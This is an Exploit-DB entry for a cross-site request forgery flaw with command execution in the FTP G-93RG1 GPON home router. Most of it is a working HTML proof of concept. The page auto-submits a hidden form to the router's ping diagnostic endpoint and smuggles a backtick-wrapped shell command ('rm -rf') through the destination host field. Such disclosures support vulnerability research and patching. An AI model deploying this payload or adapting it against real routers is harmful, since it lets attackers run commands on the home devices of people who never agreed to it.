GPON Home Router FTP G-93RG1 - Cross-Site Request Forgery / Command Execution

EDB-ID:

38073

CVE:

EDB Verified:

Author:

Phan Thanh Duy

Type:

webapps

Exploit: /

Platform:

Hardware

Date:

2015-09-02

Vulnerable App:

<!--
######################################################################
# Exploit Title: GPON Home CSRF With Command ExecuteVulnerability
# Author: Phan Thanh Duy (logicaway) - KAISAI12 (ceh.vn)
# E-mail:(facebook https://www.facebook.com/duy.phanthanh.75),(
https://www.facebook.com/kai.sai.35)
# Category: Hardware
# Google Dork: N/A
# Vendor: FTP Viet Nam
# Firmware Version: 3.0.0 Build 120531
# Product: FTP G-93RG1
#
#
# Tested on: Windows 8 64-bit
######################################################################

#Introduction
==============

#Description of Vulnerability
=============================
Execute command with CSRF

#Exploit
========
-->

<html>
<head>
<title>CSRF Demo Exploit</title>
</head>
<body>

<form name="auto" method="POST"
action="http://192.168.1.1/GponForm/diag_XForm"
enctype="multipart/form-data">
<input type="hidden" name="XWebPageName" value="diag"/>
<input type="hidden" name="diag_action" value="ping"/>
<input type="hidden" name="wan_conlist" value="0"/>
<input type="hidden" name="dest_host" value="`rm -rf stuff`"/>
<input type="hidden" name="ipver" value="0"/>
<!-- input type="submit" name="submit"/> -->
</form>
<script type="text/javascript">
      document.auto.submit();
</script>
</body>
</html>

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services